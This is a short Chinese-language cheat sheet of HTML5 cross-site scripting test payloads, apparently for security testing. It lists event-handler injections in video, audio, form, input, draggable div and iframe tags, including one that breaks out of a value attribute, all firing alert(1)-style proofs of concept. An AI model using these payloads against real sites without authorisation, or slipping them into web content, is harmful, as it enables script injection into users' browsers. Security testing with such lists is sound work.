引入媒體類測試代碼Example:
<video onerror=Javascript:alert(1)><source>
<audio onerror=Javascript:alert(1)><source>
表單點擊測試代碼Example:
<form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)
>X
鼠標事件測試代碼Example:
Before Html5:
<input type=text value=\\>Injecting here onmouSEOver=alert(Injected value)>
With Html5:
<input type=text value=\\>Injecting here onfocus=alert(Injected value) autofocus>
DIV 測試代碼Example:
<div draggable=true ondragstart=event.dataTransfer.setData(text/plain, Evil data)>
<h3>DRAG ME!!</h3>
</div>
引入框架測試代碼Example:
<iframe src=http://www.sitedirsec.com sandbox></iframe>